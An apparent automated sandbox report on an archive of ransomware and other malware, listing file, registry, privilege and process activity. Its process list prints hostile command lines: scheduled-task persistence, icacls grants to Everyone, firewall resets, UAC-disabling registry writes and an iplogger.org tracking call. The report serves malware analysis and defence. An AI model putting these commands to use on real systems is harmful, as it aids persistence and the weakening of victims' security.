| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\RVHOST.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\documents | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4324B073-AF3D-11EE-A0B6-E2EC48AD62A3} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\TEMPSP~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\ProgramData\AdobeReader\GeforceUpdater.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\TEMPEX~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\Desktop\6.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\6.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\6.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
"4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
"RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
"x2s443bc.cs1.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp" /SL5="$6022C,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6021.tmp\6022.tmp\6023.bat C:\Users\Admin\Desktop\1.exe"
C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp" /SL5="$50236,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 139781704838811.bat
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Users\Admin\Desktop\1.exe
"C:\Users\Admin\Desktop\1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
"ska2pwej.aeh.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
"bot.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s6
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\72A0.tmp\splitterrypted.vbs
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\754F.tmp\spwak.vbs
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\72A0.tmp\splitterrypted.vbs
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:17410 /prefetch:2
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\754F.tmp\spwak.vbs
C:\Users\Admin\Desktop\10.exe
"C:\Users\Admin\Desktop\10.exe"
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x40c
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
"C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
C:\Users\Admin\Desktop\5.exe
"C:\Users\Admin\Desktop\5.exe"
C:\Users\Admin\Desktop\7.exe
"C:\Users\Admin\Desktop\7.exe"
C:\Users\Admin\Desktop\8.exe
"C:\Users\Admin\Desktop\8.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@NoMoreRansom" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL\[email protected]'" /rl HIGHEST /f
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "4363463463464363463463463" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463\4363463463464363463463463.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "x2s443bc.cs1.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\dwm.exe'" /rl HIGHEST /f
C:\PROGRA~3\system.exe
C:\PROGRA~3\system.exe
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@WannaCrypt0r" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\[email protected]'" /rl HIGHEST /f
C:\Users\Admin\Desktop\6.exe
